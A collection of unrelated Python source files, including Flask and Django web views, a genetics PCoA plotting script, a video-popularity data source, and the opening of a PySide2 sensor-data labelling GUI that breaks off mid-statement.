x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 48 >= x1 and x_object + 2 <= x2 and y_object + 38 >= y1 and y_object + 24 <= y2:
stop = False
if side == 2:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 50 >= x1 and x_object + 40 <= x2 and y_object + 38 >= y1 and y_object + 28 <= y2:
stop = False
if side == 3:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 45 >= x1 and x_object <= x2 and y_object + 38 >= y1 and y_object + 28 <= y2:
stop = False
return stop
else: return True
|
from gmt import app, db
from flask import render_template, url_for, request, flash
import gmt
from gmt.models import Forename, Clan, Family, School, Samurai
from sqlalchemy.sql.expression import func
import random
@app.route('/')
@app.route('/home')
@app.route('/index')
def index():
return render_template("index.html")
@app.route('/help')
def help():
return render_template("help.html")
@app.route('/generator', methods=['GET', 'POST'])
def generator():
clan = Clan.query.all()
family = Family.query.all()
school = School.query.all()
forename = Forename.query.all()
dummy = {'dclan': int(request.form.get('clan') or -1),
'dfamily': int(request.form.get('family') or -1),
'dschool': int(request.form.get('school') or -1),
'dgender': (request.form.get('gender') or -1),
'dforename': int(request.form.get('forename') or -1),
'dhonor': int(request.form.get('honor') or -1),
'dglory': int(request.form.get('glory') or -1),
'dstatus': int(request.form.get('status') or -1),
'dtaint': int(request.form.get('taint') or -1)}
if request.method == 'POST':
if request.form.get('generate') == 'Generate':
if dummy['dclan'] == -1:
print "change"
dummy['dclan'] = Clan.query.order_by(func.random()).first().id
family = Family.query.filter(Family.clan_id==dummy['dclan'])
if dummy['dfamily'] == -1 and family.all():
dummy['dfamily'] = family.order_by(func.random()).first().id
school = School.query.filter(School.clan_id==dummy['dclan'])
if dummy['dschool'] == -1 and school.all():
dummy['dschool'] = school.order_by(func.random()).first().id
if dummy['dgender'] == -1:
dummy['dgender'] = random.choice(['Male', 'Female'])
forename = Forename.query.filter(Forename.gender==dummy['dgender'])
if dummy['dforename'] == -1 and forename.all():
dummy['dforename'] = forename.order_by(func.random()).first().id
if dummy['dhonor'] == -1:
dummy['dhonor'] = int(random.gammavariate(8.0, 4.5)) % 100
if dummy['dglory'] == -1:
dummy['dglory'] = int(random.gammavariate(8.0, 3.0)) % 100
if dummy['dstatus'] == -1:
dummy['dstatus'] = int(random.gammavariate(3.5, 6.0)) % 100
if dummy['dtaint'] == -1:
dummy['dtaint'] = int(random.gammavariate(1.0, 0.5)) % 100
if request.form.get('reset') == 'Reset':
dummy['dclan'] = -1
dummy['dfamily'] = -1
dummy['dschool'] = -1
dummy['dgender'] = -1
dummy['dforename'] = -1
dummy['dhonor'] = -1
dummy['dglory'] = -1
dummy['dstatus'] = -1
dummy['dtaint'] = -1
if request.form.get('save') == 'Save':
success = True
if any(v == -1 for v in dummy.itervalues()):
flash("Choose everything manually or use 'Generate'!", "error")
success = False
family = Family.query.filter(Family.clan_id==dummy['dclan'])
if all(v.id != dummy['dfamily'] for v in family.all()):
flash("Family or Clan does not fit!", "error")
is_success = False
school = School.query.filter(School.clan_id==dummy['dclan'])
if all(v.id != dummy['dschool'] for v in school.all()):
flash("School or Clan does not fit!", "error")
success = False
forename = Forename.query.filter(Forename.gender==dummy['dgender'])
if all(v.id != dummy['dforename'] for v in forename.all()):
flash("Gender or Name does not fit!", "error")
success = False
if success:
flash("Everything is fine!", "success")
samurai = Samurai(dummy['dgender'], dummy['dhonor'], dummy['dglory'],\
dummy['dstatus'], dummy['dtaint'], dummy['dclan'],\
dummy['dfamily'], dummy['dschool'], dummy['dforename'])
db.session.add(samurai)
db.session.commit()
return render_template("generator.html", \
clans=clan, families=family, schools=school, forenames=forename, **dummy)
@app.route('/manager', methods=['GET', 'POST'])
def manager():
samurai = Samurai.query.all()
dsamurai = int(request.form.get('samurai') or -1)
marked_samurai = Samurai.query.filter(Samurai.id==dsamurai).first()
display = False
edit = False
if request.method == 'POST':
if request.form.get('edit') == 'Edit':
if marked_samurai:
display = True
edit = True
elif request.form.get('edit') == 'Save':
if marked_samurai:
display = True
marked_samurai.notes = request.form.get('notes')
marked_samurai.honor = int(float(request.form.get('honor')) * 10)
marked_samurai.glory = int(float(request.form.get('glory')) * 10)
marked_samurai.status = int(float(request.form.get('status')) * 10)
marked_samurai.taint = int(float(request.form.get('taint')) * 10)
db.session.add(marked_samurai)
db.session.commit()
if request.form.get('load') == 'Load':
if marked_samurai:
display = True
if request.form.get('delete') == 'Delete':
if marked_samurai:
db.session.delete(marked_samurai)
db.session.commit()
samurai = Samurai.query.all()
return render_template("manager.html", display=display, edit=edit, \
dsamurai=dsamurai, marked_samurai=marked_samurai, samurais=samurai)
|
import os, logging
from rest_framework import generics
from rest_framework.permissions import AllowAny
from django.views.generic import View
from django.http import HttpResponse
from django.conf import settings
from .models import SimpleCV
from .serializers import SimpleCVSerializer
# Create your views here.
logger = logging.getLogger("")
class ListCVs(generics.ListAPIView):
queryset = SimpleCV.objects.all()
serializer_class = SimpleCVSerializer
permission_classes = (AllowAny,)
class CVbyRegionText(generics.ListAPIView):
serializer_class = SimpleCVSerializer
permission_classes = (AllowAny,)
def get_queryset(self):
"""
Optionally restricts the returned purchases by filtering against query parameter in the URL.
"""
queryset = SimpleCV.objects.all()
#logger.debug(self.request.query_params.values())
# text = self.request.query_params.get('text', None)
# regionId = self.request.query_params.get('regionId', None)
text = self.kwargs.get('text', None)
regionId = self.kwargs.get('regionId', None)
logger.debug(text)
logger.debug(type(text))
logger.debug(regionId)
if text and text != '-':
queryset = queryset.filter(jobTitle__icontains=text)
if regionId:
queryset = queryset.filter(regionId=regionId)
return queryset
class FrontendAppView(View):
"""
Serves the compiled frontend entry point
"""
def get(self, request):
try:
with open(os.path.join(settings.REACT_APP_DIR, 'build', 'index.html')) as f:
return HttpResponse(f.read())
except Exception as exc:
logging.exception('Error occured: %s' % repr(exc))
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
) |
from django.shortcuts import render, get_object_or_404
from .models import Kategor, Tovar, Tovar_inphoto, Tovar_img
from django.views.generic.edit import FormView
from django.contrib.auth.forms import UserCreationForm
from django.http import JsonResponse
from django.utils.http import is_safe_url
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME, login as auth_login, logout as auth_logout
from django.utils.decorators import method_decorator
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.views.generic import FormView, RedirectView
from django.http import HttpResponseRedirect
from django.views.generic.base import View
from django.contrib.auth import logout
from django.http import HttpResponse
from django.shortcuts import render_to_response
from cart.forms import CartAddProductForm
from .forms import TovarForm
from .forms import ContactForm
from django.core.mail import send_mail,BadHeaderError
def index(request):
return render(request, 'shop/index.html', {})
def info(request):
return render(request, 'shop/info_gl_str.html', {})
def log1(request):
return render(request, 'shop/login_menu.html', {})
def login(request):
if request.method == 'POST':
email = request.form.get("email")
password = request.form.get("passwd")
return render(request, 'shop/login.html', {'email': email, 'password': password})
class RegisterFormView(FormView):
form_class = UserCreationForm
# Ссылка, на которую будет перенаправляться пользователь в случае успешной регистрации.
# В данном случае указана ссылка на страницу входа для зарегистрированных пользователей.
success_url = "/log1/"
# Шаблон, который будет использоваться при отображении представления.
template_name = "shop/login_menu.html"
def form_valid(self, form):
# Создаём пользователя, если данные в форму были введены корректно.
form.save()
# Вызываем метод базового класса
return super(RegisterFormView, self).form_valid(form)
# Функция для установки сессионного ключа.
# По нему django будет определять, выполнил ли вход пользователь.
class LoginView(FormView):
"""
Provides the ability to login as a user with a username and password
"""
success_url = '/'
form_class = AuthenticationForm
redirect_field_name = REDIRECT_FIELD_NAME
template_name = "shop/login.html"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.request = None
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth_login(self.request, form.get_user())
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
class LogoutView(View):
def get(self, request):
# Выполняем выход для пользователя, запросившего данное представление.
logout(request)
# После чего, перенаправляем пользователя на главную страницу.
return HttpResponseRedirect("/")
def ProductList(request, category_slug=None):
category = None
categories = Kategor.objects.all()
products = Tovar.objects.filter(tovar_available=True)
if category_slug:
category = get_object_or_404(Kategor, kategory_slug=category_slug)
products = products.filter(kategory_id=category)
if 'phone_name' in request.GET:
products = products.filter(tovar_name__icontains=request.GET['phone_name'])
checki = request.GET.get('checki', False)
check0 = request.GET.get('check0', False)
check1 = request.GET.get('check1', False)
check2 = request.GET.get('check2', False)
check3 = request.GET.get('check3', False)
check4 = request.GET.get('check4', False)
check5 = request.GET.get('check5', False)
check6 = request.GET.get('check6', False)
check7 = request.GET.get('check7', False)
check8 = request.GET.get('check8', False)
check9 = request.GET.get('check9', False)
check10 = request.GET.get('check10', False)
check11 = request.GET.get('check11', False)
check12 = request.GET.get('check12', False)
check13 = request.GET.get('check13', False)
check14 = request.GET.get('check14', False)
check15 = request.GET.get('check15', False)
check16 = request.GET.get('check16', False)
check17 = request.GET.get('check17', False)
check18 = request.GET.get('check18', False)
check19 = request.GET.get('check19', False)
check20 = request.GET.get('check20', False)
check21 = request.GET.get('check21', False)
check22 = request.GET.get('check22', False)
check23 = request.GET.get('check23', False)
check24 = request.GET.get('check24', False)
if checki:
try:
z = [check0, check1, check2, check3, check4, check5, check6, check7, check8, check9,
check10, check11, check12, check13, check14, check15, check16, check17,
check18, check19, check20, check21, check22, check23, check24]
a0 = Tovar_inphoto.objects.filter(tovarinphoto_proizv__in=[z[0], z[1], z[2], z[6]])
list_a0 = []
for i in a0.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a0.append(i)
a1 = Tovar_inphoto.objects.filter(tovarinphoto_diagon__in=[z[3], z[4], z[5]])
list_a1 = []
for i in a1.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a1.append(i)
a2 = Tovar_inphoto.objects.filter(tovarinphoto_ram__in=[z[7], z[8], z[9], z[10]])
list_a2 = []
for i in a2.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a2.append(i)
a3 = Tovar_inphoto.objects.filter(
tovarinphoto_osnkamera__in=[z[11], z[12], z[13], z[14], z[15], z[16], z[17]])
list_a3 = []
for i in a3.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a3.append(i)
a4 = Tovar_inphoto.objects.filter(tovarinphoto_opsystem__in=[z[18], z[19], z[20]])
list_a4 = []
for i in a4.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a4.append(i)
a5 = Tovar_inphoto.objects.filter(tovarinphoto_cpu__in=[z[21], z[22], z[23], z[24]])
list_a5 = []
for i in a5.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a5.append(i)
list_all_p = []
list_all_proizv = [list_a0, list_a1, list_a2, list_a3, list_a4, list_a5]
for i in list_all_proizv:
if len(i) != 0:
list_all_p.append(set(i))
else:
pass
iter_a = list_all_p[0]
for i in list_all_p:
iter_a &= i
iter_a = list(iter_a)
list_tovar = []
for i in Tovar_inphoto.objects.filter(tovarinphoto_proizv__in=iter_a):
list_tovar.append(i.tovar_id.tovar_name)
products = Tovar.objects.filter(tovar_name__in=list_tovar)
except IndexError:
pass
return render(request, 'shop/smartfons.html', {
'category': category,
'categories': categories,
'products': products
})
def get_category_list(max_results=0, starts_with=''):
cat_list = []
if starts_with:
cat_list = Tovar.objects.filter(tovar_name__icontains=starts_with)
if max_results > 0:
if len(cat_list) > max_results:
cat_list = cat_list[:max_results]
return cat_list
def suggest_category(request):
cat_list = []
starts_with = ''
if request.method == 'GET':
starts_with = request.GET['suggestion']
cat_list = get_category_list(8, starts_with)
return render(request, 'shop/category_list.html', {'cat_list': cat_list})
# Страница товара
def ProductDetail(request, id, slug):
product = get_object_or_404(Tovar, id=id, tovar_slug=slug, tovar_available=True)
har = Tovar_inphoto.objects.get(id=id)
fot = har.phototovar.all()[0]
cart_product_form = CartAddProductForm()
return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
'cart_product_form': cart_product_form,
'fot': fot})
# def ProductDetail(request, id, slug):
# product = get_object_or_404(Tovar, id=id, tovar_slug=slug, tovar_available=True)
# har = Tovar_inphoto.objects.get(id=id)
# cart_product_form = CartAddProductForm()
# if request.method == "GET":
# form = TovarForm(request.GET.get("phone_name", None))
# print(request.GET['phone_name'])
# if form:
# product = Tovar_inphoto.objects.filter(tovarinphoto_info__icontains=form)
# return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
# 'cart_product_form': cart_product_form,
# 'form': form})
# else:
# form = TovarForm()
# return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
# 'cart_product_form': cart_product_form,
# 'form': form})
# def ProductDetail(request, id, slug):
# product = get_object_or_404(Tovar, id=id, slug=slug, available=True)
# cart_product_form = CartAddProductForm()
# return render_to_response('shop/product/detail.html',
# {'product': product,
# 'cart_product_form': cart_product_form})
# Функция формы обратной связи
def contactform(reguest):
if reguest.method == 'POST':
form = ContactForm(reguest.POST)
# Если форма заполнена корректно, сохраняем все введённые пользователем значения
if form.is_valid():
subject = form.cleaned_data['subject']
sender = form.cleaned_data['sender']
message = form.cleaned_data['message']
copy = form.cleaned_data['copy']
recepients = ['leva2048@mail.ru']
# Если пользователь захотел получить копию себе, добавляем его в список получателей
if copy:
recepients.append(sender)
try:
send_mail(subject, message, 'leva2048@mail.ru', recepients)
except BadHeaderError: # Защита от уязвимости
return HttpResponse('Invalid header found')
# Переходим на другую страницу, если сообщение отправлено
return HttpResponseRedirect('/thanks/')
else:
form = ContactForm()
# Выводим форму в шаблон
return render(reguest, 'contact.html', {'form': form })
def thanks(reguest):
thanks = 'thanks'
return render(reguest, 'thanks.html', {'thanks': thanks})
|
#
# Copyright (c) 2020 Expert System Iberia
#
"""Implements a factcheckability reviewer based on the ClaimBuster API
"""
def review(item, config):
"""Reviews the incoming item and returns
:param item: a single item or a list of items, in this case the
items must be `Sentence` instances.
:param config: a configuration map
:returns: one or more Review objects for the input items
:rtype: dict or list of dict
"""
raise NotImplemented()
|
#!/usr/bin/env spcli
from seqpy import cout, cerr
from seqpy.cmds import arg_parser
from seqpy.core.bioio import grpparser
from itertools import cycle, combinations
from matplotlib import pyplot as plt
try:
from matplotlib import pyplot as plt
import allel
except:
cexit('ERR: require properly installed matplotlib and scikit-allel')
import numpy as np
def init_argparser():
p = arg_parser("Create PCoA plot based on distance matrix file")
p = grpparser.init_argparser(p)
p.add_argument('--dpi', type=int, default=600)
p.add_argument('--dotsize', type=float, default=0.25)
p.add_argument('-o', '--outfile', default="outplot.pcoa.png")
p.add_argument('infile')
return p
def main( args ):
pcoa( args )
def pcoa( args ):
cerr('I: reading group info')
group_parser = grpparser.GroupParser( args )
group_parser.parse()
with open(args.infile, 'rb') as infile:
cerr('I: reading sample header...')
samples = next(infile).decode('UTF-8').strip().split()
groups = group_parser.assign_groups(samples)
cerr('I: reading distance matrix')
distm = np.loadtxt(infile, delimiter='\t')
pcoa = allel.pcoa(distm)
fig = plt.figure( figsize = (27, 9), dpi = args.dpi )
fig_idx = 1
colour_list = group_parser.colour_list()
for pcx, pcy in combinations([0,1,2], 2):
ax = fig.add_subplot(1, 3, fig_idx)
fig_idx += 1
make_plot(ax, pcoa[0][:,pcx], pcoa[0][:,pcy], colour_list, args.dotsize)
fig.tight_layout()
fig.savefig(args.outfile)
def make_plot(axis, x, y, colours, dotsize):
axis.scatter( x, y, dotsize, c=colours )
|
"""
Another hexastore implementation.
An implementation of "Sextuple Indexing for Semantic Web Data Management"
from C. Weiss et al.. This is an implementation for fun only, hence may
be used if really needed, else it is adviced to use something more serious.
Example
-------
import hexastore
store = hexastore.Hexastore()
store.insert(["hexastores", "are", "awesome"])
store.insert(["cats", "are", "awesome"])
result = store.search(subject="cats");
"""
from hexastore import version
from hexastore import hexastore
Hexastore = hexastore.Hexastore
__author__ = "Eric Matti"
__version__ = version.__version__
__all__ = [Hexastore]
|
"""
This module defines the sources of data used in the predictive analysis library.
User applicatios should import the factory method `get_data_source` in order to
instantiate the classes defined on this module.
"""
import numpy as np
from typing import List
from year_ap_predictive.library_types import SampleDataPoint
from data_sources.analytics_platform_data_source import AnalyticsPlatformDataSource
# disable numpy warnings
np.warnings.filterwarnings('ignore')
# Helper functions
def project_column(rows, column_index):
return [row[column_index] for row in rows]
def to_float64_np_array(rows):
return np.asarray(rows, dtype=np.float64)
def get_log10_column(raw, column_index: int):
return np.log10(to_float64_np_array(project_column(raw, column_index)))
def check_all_log_values_are_valid(feature_vector: List[float], value_vector: List[float]) -> bool:
return not np.any(np.isneginf(np.concatenate((feature_vector, value_vector))))
# Data Sources
class EarlyToLatePopularityDataSource(AnalyticsPlatformDataSource):
"""
Source of data for Szabo and Huberman's Linear Log Model on prediction of late video popularity.
Due to the log transformation required by this algorithm, samples with
popularity count equals to zero are rejected by this data source.
"""
popularity_at_age_sql = """
SELECT
COALESCE(SUM(svm."ViewCount"), 0.0)
FROM
"SourceVideos" AS sv
LEFT JOIN
"SourceVideoMetrics" AS svm on sv."Id" = svm."VideoId"
WHERE
sv."Id" = %s
AND svm."EventDate" < sv."PublishedAt" + INTERVAL '%s days'
AND svm."EventDate" >= sv."PublishedAt"
"""
total_view_count_column_index = 0
def __init__(self, early_age: int, late_age: int, config_file: str) -> None:
"""
Keyword arguments:
early_age -- number of days that define early popularity
late_age -- number of days that define late popularity
"""
super().__init__(config_file)
self.set_params(early_age, late_age)
def set_params(self, early_age: int, late_age: int):
self.early_age = early_age
self.late_age = late_age
def list_sample_ids(self):
"""
list of source video ids
"""
cmd = """
SELECT
"Id"
FROM
"SourceVideos"
"""
raw = self.simple_execute(cmd)
return [str(r[0]) for r in raw]
def get_feature_vector(self, sample_id):
"""
The only component is the early popularity count
"""
raw = self.simple_execute(self.popularity_at_age_sql, (sample_id, self.early_age))
return get_log10_column(raw, self.total_view_count_column_index)
def get_value_vector(self, sample_id):
"""
The only component is the late popularity count
"""
raw = self.simple_execute(self.popularity_at_age_sql, (sample_id, self.late_age))
return get_log10_column(raw, self.total_view_count_column_index)
def get_class_of_sample(self, sample_id):
"""
The platform of the source video
"""
cmd = """
SELECT
"Platform"
FROM
"SourceVideos"
WHERE
"Id" = %s
"""
raw = self.simple_execute(cmd, (sample_id,))
return raw[0][0]
def should_consider_sample_id(self, dataPoint: SampleDataPoint):
"""
Rejects data sources with 0's on any of the entries of both the feature
and value vector
Why? This data source takes the log of the view count at the k-th
day. The logarithm of 0 is not defined and thus this entries must be
removed.
From a business point of view, it can be argued that no prediction
can be done uppon a video that was not yet watched.
"""
return check_all_log_values_are_valid(dataPoint.feature, dataPoint.value)
class MetaTagAwareEarlyToLatePopularityDataSource(EarlyToLatePopularityDataSource):
def __init__(self, early_age: int, late_age: int, config_file: str, tag_types: List[str]) -> None:
super().__init__(early_age, late_age, config_file)
self.tag_types = tag_types
def get_class_of_sample(self, sample_id):
"""
The platform of the source video
"""
cmd = """
SELECT
sv."Platform",
amt."Tag"
FROM
"SourceVideos" AS sv
JOIN
"ApplicationVideoSourceVideos" AS avsv ON sv."Id" = avsv."SourceVideoId"
JOIN
"ApplicationVideos" AS av ON avsv."ApplicationVideoId" = av."Id"
JOIN
"ApplicationVideoApplicationMetaTags" AS avamt ON av."Id" = avamt."VideoId"
JOIN
"ApplicationMetaTagsTypes" AS amtt ON amtt."Id" = avamt."TypeId"
JOIN
"ApplicationMetaTags" AS amt ON amt."Id" = avamt."TagId"
WHERE
sv."Id" = %s
AND
amtt."Type" IN %s
"""
raw = self.simple_execute(cmd, (sample_id, self.tag_types))
groups = [raw[0][0]] + [row[1] for row in raw]
return "-".join(groups)
class MetaTagExclusiveEarlyToLatePopularityDataSource(EarlyToLatePopularityDataSource):
def __init__(self, early_age: int, late_age: int, config_file: str, tag_types: List[str]) -> None:
super().__init__(early_age, late_age, config_file)
self.tag_types = tag_types
def get_class_of_sample(self, sample_id):
"""
The platform of the source video
"""
cmd = """
SELECT
amt."Tag"
FROM
"SourceVideos" AS sv
JOIN
"ApplicationVideoSourceVideos" AS avsv ON sv."Id" = avsv."SourceVideoId"
JOIN
"ApplicationVideos" AS av ON avsv."ApplicationVideoId" = av."Id"
JOIN
"ApplicationVideoApplicationMetaTags" AS avamt ON av."Id" = avamt."VideoId"
JOIN
"ApplicationMetaTagsTypes" AS amtt ON amtt."Id" = avamt."TypeId"
JOIN
"ApplicationMetaTags" AS amt ON amt."Id" = avamt."TagId"
WHERE
sv."Id" = %s
AND
amtt."Type" IN %s
"""
raw = self.simple_execute(cmd, (sample_id, self.tag_types))
groups = [row[0] for row in raw]
return "-".join(groups)
|
"""This builds a GUI which can
a) load and show IMU data
b) apply an algorithm for stride segmentation and event detection
c) be used to manually add/delete/adapt labels for strides and/or activites.
isort:skip_file (Required import order: PySide2, pyqtgraph, mad_gui.*)
"""
import os
import sys
import warnings
from pathlib import Path
import platform
import ctypes
import pickle
from typing import Dict, Tuple
import pandas as pd
import pyqtgraph as pg
from PySide2.QtCore import Qt
from PySide2.QtUiTools import loadUiType
from PySide2.QtWidgets import (
QFileDialog,
QMessageBox,
QVBoxLayout,
QMainWindow,
QApplication,
)
from PySide2.QtGui import QPalette
from mad_gui.components.dialogs.data_selector import DataSelector
from mad_gui.components.dialogs.plugin_selection.load_data_dialog import LoadDataDialog
from mad_gui.components.dialogs.plugin_selection.plugin_selection_dialog import PluginSelectionDialog
from mad_gui.components.dialogs.user_information import UserInformation
from mad_gui.components.helper import set_cursor
from mad_gui.components.key_event_handler import KeyEventHandler
from mad_gui.components.sidebar import Sidebar
from mad_gui.config import Config, BaseSettings, BaseTheme
from mad_gui.models.global_data import GlobalData
from mad_gui.models.local import PlotData
from mad_gui.models.ui_state import UiState, PlotState, MODES
from mad_gui.plot_tools.plots import SensorPlot, VideoPlot
from mad_gui.plot_tools.labels import BaseRegionLabel, BaseEventLabel
from mad_gui.plugins.base import BaseExporter, BaseImporter, BaseAlgorithm
from mad_gui.plugins.helper import filter_plugins
from mad_gui.state_keeper import StateKeeper
from mad_gui.utils.helper import resource_path
from mad_gui.windows import VideoWindow
from mad_gui.qt_designer import UI_PATH
try:
import pyi_splash # noqa
pyi_splash.close()
except ModuleNotFoundError:
# we only need to import this when we are in a .exe, see pyinstaller docs
pass
# helps to make plot zooming smooth even when line width >1
pg.setConfigOption("useOpenGL", True)
# CI can't handle openGL
if os.environ.get("GITHUB_CI"):
pg.setConfigOption("useOpenGL", False)
# Make sure that graphs are properly scaled when having multiple screens
QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)
os.environ["QT_AUTO_SCREEN_SCALE_FACTOR"] = "1"
if platform.system() == "Windows" and int(platform.release()) >= 8:
ctypes.windll.shcore.SetProcessDpiAwareness(True)
ui_path = resource_path(str(UI_PATH / "main.ui"))
if ".ui" in ui_path:
try:
Window, _ = loadUiType(ui_path)
except TypeError:
try:
uic_path = Path(os.sep.join(sys.executable.split(os.sep)[:-1])) / "Scripts"
sys.path.append(str(uic_path))
Window, _ = loadUiType(ui_path)
except TypeError as e:
raise FileNotFoundError(
"Probably python did not find `pyside2-uic`. See "
'"https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#pyside2-uic-not-found" for more '
"information"
) from e
elif ".py" in ui_path:
from mad_gui.qt_designer.build.main import Ui_MainWindow as Window # noqa
class MainWindow(QMainWindow):
"""This class implements the functionalities of the buttons in the GUI.
Furthermore, it serves as an interface to Input-Output files, which are different for each data source,
see our `General Information` part of the docs, section `Adding support for other systems`."""
def __init__(
self,
parent=None,
data_dir=None,
settings=BaseSettings,
theme=BaseTheme,
plugins=None,
labels=None,
events=None,
):
super().__init__()
self.check_arguments(plugins, labels, events)
Config.set_theme(theme)
Config.set_settings(settings)
self.global_data = GlobalData(parent=self)
self.ui_state = UiState(parent=self)
self.plot_state = PlotState(parent=self)
self.global_data.labels = labels or []
self.global_data.events = events or []
self.parent = parent
# Setting up the UI
self.ui = Window()
self.ui.setupUi(self)
c = theme.COLOR_DARK
self.setStyleSheet(f"background-color: rgb({c.red()}, {c.green()}, {c.blue()});")
self.setStyleSheet(f"background-color: rgb({c.red()}, {c.green()}, {c.blue()});")
self.palette().setColor(QPalette.Active, QPalette.Window, theme.COLOR_LIGHT)
self._set_window_properties()
# Register sidebar component logic
self.menu = Sidebar(self.ui, parent=parent)
self.ui_state.bind_bidirectional(self.menu.set_collapsed, self.menu.collapsed_changed, "menu_collapsed")
self.menu.set_collapsed(False)
# Setting up additional windows
self.VideoWindow = VideoWindow(parent=self)
self.data_selector = None
# can only be done after adding the windows above
self.label_buttons = {
"add": self.ui.btn_add_label,
"edit": self.ui.btn_edit_label,
"remove": self.ui.btn_remove_label,
"sync": self.ui.btn_sync_data,
}
self.menu_buttons = {
"load": self.ui.btn_load_data,
"algorithm": self.ui.btn_use_algorithm,
"export": self.ui.btn_export,
"save": self.ui.btn_save_data_gui_format,
}
# Setting up the plots
self.sensor_plots = {}
self.video_plot = None
self._configure_buttons()
# Setting up some attributes
self.data_types = None # data that the user wants to load/save (sensor, activities, and/or strides)
self._user_is_informed = False
self.closeEvent = self._close_event # doing this to have consistent method naming
self.global_data.bind(self.ui.label_displayed_data.setText, "data_file")
self.global_data.bind(self._plot_data, "plot_data", initial_set=False)
self.global_data.bind(self._set_sync, "sync_file", initial_set=False)
self.plot_state.bind(self._update_button_state, "mode", initial_set=True)
# Setup Key Event handler
self.key_event_handler = KeyEventHandler(plot_state=self.plot_state, parent=self)
self.keyPressEvent = self.key_event_handler.key_pressed
StateKeeper.setParent(self)
StateKeeper.announce_data_types.connect(self._set_data_types)
StateKeeper.save_sync.connect(self._save_sync)
# Note: Need to make all connections and ui setup before updating the value
self.global_data.base_dir = data_dir
self.global_data.plugins = list(plugins)
def check_arguments(self, plugins, labels, events):
for plugin in plugins:
self._check_argument(plugin, (BaseImporter, BaseAlgorithm, BaseExporter))
for label in labels:
self._check_argument(label, (BaseRegionLabel,))
if label.min_height > label.max_height:
raise ValueError(
f"For the class {label.__name__}, min_height is higher than max_height, please fix " f"that."
)
if label.max_height > 1:
raise ValueError(
f"For the class {label.__name__}, max_height is > 1, although it should be between 0 "
f"and 1. Please fix that."
)
for event in events:
self._check_argument(event, (BaseEventLabel,))
@staticmethod
def _get_element_base(plugin):
if issubclass(plugin, BaseRegionLabel):
return "labels"
if issubclass(plugin, BaseEventLabel):
return "events"
if issubclass(plugin, (BaseImporter, BaseAlgorithm, BaseExporter)):
return "plugin"
return "unknown"
def _check_argument(self, element, base_classes: Tuple):
if not issubclass(element, base_classes):
base = self._get_element_base(element)
if base == "unknown":
raise ValueError(
f"{element.__name__} must inherit from one of BaseImporter, BaseAlgorithm, "
f"BaseExporter, BaseRegionLabel, or BaseEventLabel but it does not."
)
raise ValueError(
f"You passed {element} with the keyword 'plugin' to the GUI. However, "
f"your plugin does not inherit from BaseImporter, BaseAlgorithm, or BaseExporter.\n"
f"You should have passed it with: start_gui({base}=[{element.__name__}])"
)
def _enable_buttons(self, enable: bool):
"""In the beginning we want the user to load data, so we just show the two buttons."""
for button in [
self.ui.btn_add_label,
self.ui.btn_edit_label,
self.ui.btn_remove_label,
self.ui.btn_sync_data,
self.ui.btn_export,
self.ui.btn_save_data_gui_format,
self.ui.btn_use_algorithm,
]:
if len(self.sensor_plots) == 1 and button == self.ui.btn_sync_data:
continue
button.setDisabled(not enable)
def is_data_plotted(self):
return bool(self.sensor_plots)
def _configure_buttons(self):
# buttons menu
self.ui.btn_use_algorithm.clicked.connect(self.use_algorithm)
self.ui.btn_load_data.clicked.connect(self.import_data)
self.ui.btn_save_data_gui_format.clicked.connect(self.save_data_gui_format)
self.ui.btn_export.clicked.connect(self.export)
self.ui.btn_load_data_gui_format.clicked.connect(self._handle_load_data_gui_format)
# buttons manual annotation
light = Config.theme.COLOR_LIGHT
dark = Config.theme.COLOR_DARK
light_hsl = light.toHsl()
even_lighter = light_hsl.lighter(150).toRgb()
for k, b in self.label_buttons.items():
b.setObjectName(k)
b.toggled.connect(self.on_main_buttons_clicked)
qt_light = f"rgb({light.red()}, {light.green()}, {light.blue()})"
qt_lighter = f"rgb({even_lighter.red()}, {even_lighter.green()}, {even_lighter.blue()})"
qt_dark = f"rgb({dark.red()}, {dark.green()}, {dark.blue()})"
b.setStyleSheet(
f"QPushButton"
f"{{\nborder:2px solid;\nborder-color: {qt_light};\npadding: 3px;\nbackground-color:{qt_light};"
f"\ntext-align: left;\ncolor:{qt_dark};\n"
f"border-radius: 5px;}}\n\n"
f"QPushButton:hover{{\nborder:2px solid;\nborder-color: {qt_lighter};\n}}"
f"QPushButton:disabled{{\n background-color: rgb(160,160,160);\n"
f"color: rgb(120,120,120)}}"
f"QPushButton:checked{{background-color: {qt_lighter};\n}}"
f"QPushButton:pressed{{\n background-color: {qt_lighter};\n}}"
)
b.setFlat(False)
for k, b in self.menu_buttons.items():
b.setObjectName(k)
b.toggled.connect(self.on_main_buttons_clicked)
b.setStyleSheet(
f"QPushButton"
